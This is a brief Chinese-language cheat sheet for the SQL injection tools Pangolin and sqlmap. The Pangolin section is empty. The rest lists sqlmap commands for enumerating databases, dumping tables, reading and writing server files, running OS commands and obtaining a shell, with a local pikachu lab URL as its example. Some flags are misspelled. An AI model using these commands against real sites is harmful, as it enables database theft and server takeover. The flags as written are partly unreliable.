SQL注入的两种自动化工具,穿山甲和sqlmap
一、穿山甲工具
二、sqlmap软件
注:一般sqlmap需要使用Python2.7打开
HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443
-u get方式注入常用
-risk 选择测试风险,默认为1,一般是3
-batch-smart 智能测试模式
--users 列出所有用户
--is-dba 判断当前用户是否为管理员用户
--current-db 当前数据库名称
--dbs 查询所有数据库名称
-D 数据库名称 --tables 列出该数据库的所有表
-D 数据库名称 -T 表名称 --columns 列出字段名称
-D 数据库名称 -T 表名称 -C 字段名1,字段名2 --dump 下载数据库
--os-shell 获得 对方webshell,可以执行windows/linux 系统命令
--file-read 读文件,下载文件
--file-write 写文件,上传文件
sqlmap -u url网址 -u:url的意思
sqlmap -u url网址 --forms
查询数据库信息:sqlmap -u url网址 --forms --dbs
自动获取信息:sqlmap -u url网址 --threads 5 --batch_smart
post请求方式:sqlmap -r 文件路径
判断用户是否为管理sqlmap -u url地址 --is-dba
判断当前连接数据库 sqlmap -u url地址 --forms --current-db
查询说有数据库信息 sqlmap -u url地址 --forms --dbs
sqlmap -u url地址 -D 数据库名称 --tabls
sqlmap -u url地址 -D 数据库名称 -T 表名 --columns
脱库 sqlmap -u url地址 -D 数据库名称 -T 表名 -C 字段名 --dump
读取网站文件信息:sqlmap -u url地址 --file-read 文件路径
执行命令: sqlmap -u url地址 --OS-cmd 命令
获取shell: sqlmap -u url地址 --OS-shell
上传文件:sqlmap -u url地址 --file-write 文件写入的路径 前提需要知道网站个目录路径在哪
sqlmap 测试多个参数的链接的时候可以加""进行
例如:sqlmap -u ''http://127.0.0.1/pikachu/vul/sqli/sqli_id?id=3&password=114"